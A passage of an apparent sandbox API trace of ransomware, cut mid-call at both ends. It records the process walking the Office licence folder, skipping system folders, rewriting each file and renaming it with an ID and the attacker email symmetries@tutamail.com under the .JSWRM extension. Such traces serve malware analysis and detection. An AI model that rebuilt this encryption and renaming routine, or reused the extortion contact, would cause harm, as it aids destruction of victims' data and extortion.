nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.106] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.106] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0106.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.107] CloseHandle (hObject=0x45c) returned 1 [0106.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236a28 [0106.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0106.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0106.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0106.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0106.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0106.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b768 [0106.107] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ede0 [0106.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b768 | out: hHeap=0x1e0000) returned 1 [0106.107] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0106.107] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ede0 | out: hHeap=0x1e0000) returned 1 [0106.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236a28 | out: hHeap=0x1e0000) returned 1 [0106.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2368b8 | out: hHeap=0x1e0000) returned 1 [0106.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.108] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe77be149, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe77be149, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe78a2f2d, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5d23, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", cAlternateFileName="O37BCE~1.XRM")) returned 1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2=".") returned 1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="..") returned 1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="...") returned 1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="windows") returned -1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="recovery") returned -1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="perflogs") returned -1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="system volume information") returned -1 [0106.108] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpString2="msocache") returned 1 [0106.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0106.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.108] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.108] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.108] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0106.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c170 [0106.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0106.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial5-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0106.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c170 | out: hHeap=0x1e0000) returned 1 [0106.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bda8 [0106.109] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235bc8 | out: hHeap=0x1e0000) returned 1 [0106.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.109] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bce0 [0106.109] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.109] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=23843) returned 1 [0106.109] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.109] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5d20) returned 0x24c1d0 [0106.109] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5d20, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5d20, lpOverlapped=0x0) returned 1 [0106.112] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.112] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5d20, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5d20, lpOverlapped=0x0) returned 1 [0106.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.113] CloseHandle (hObject=0x45c) returned 1 [0106.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b8f8 [0106.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0106.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0106.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0106.113] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ecb8 [0106.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0106.113] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.113] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ecb8 | out: hHeap=0x1e0000) returned 1 [0106.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b8f8 | out: hHeap=0x1e0000) returned 1 [0106.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bce0 | out: hHeap=0x1e0000) returned 1 [0106.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.114] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.114] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe76ff4e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe76ff4e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe787ccd8, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d87, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", cAlternateFileName="O380E1~1.XRM")) returned 1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2=".") returned 1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="..") returned 1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="...") returned 1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="windows") returned -1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0106.114] lstrcmpiW (lpString1="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0106.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0106.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.114] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0106.114] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22d0a0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0106.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0106.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0106.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0106.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", cchWideChar=41, lpMultiByteStr=0x22cdc8, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 41 [0106.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0106.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0106.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bda8 | out: hHeap=0x1e0000) returned 1 [0106.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0106.115] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0106.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0106.115] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0106.115] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11655) returned 1 [0106.115] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.115] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d80) returned 0x24c1d0 [0106.115] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d80, lpOverlapped=0x0) returned 1 [0106.123] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0106.123] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d80, lpOverlapped=0x0) returned 1 [0106.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0106.123] CloseHandle (hObject=0x45c) returned 1 [0106.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bb50 [0106.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0106.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0106.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0106.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0106.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0106.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0106.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0106.123] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0106.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0106.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0106.123] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0106.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0106.123] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0106.124] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365smallbuspremr_subtrial5-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bb50 | out: hHeap=0x1e0000) returned 1 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0106.125] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe768ce3a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe768ce3a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe7771c53, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x299b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="OneNoteFreeR_Bypass-pl.xrm-ms", cAlternateFileName="ONCF62~1.XRM")) returned 1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2=".") returned 1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="..") returned 1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="...") returned 1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="windows") returned -1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="recovery") returned -1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="perflogs") returned -1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="documents and settings") returned 1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="system volume information") returned -1 [0106.125] lstrcmpiW (lpString1="OneNoteFreeR_Bypass-pl.xrm-ms", lpString2="msocache") returned 1 [0106.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0106.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0106.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteFreeR_Bypass-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0106.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0106.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0106.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0106.125] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OneNoteFreeR_Bypass-pl.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OneNoteFreeR_Bypass-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0106.125] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0106.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0106.125] WideCharToMultiByte (in: 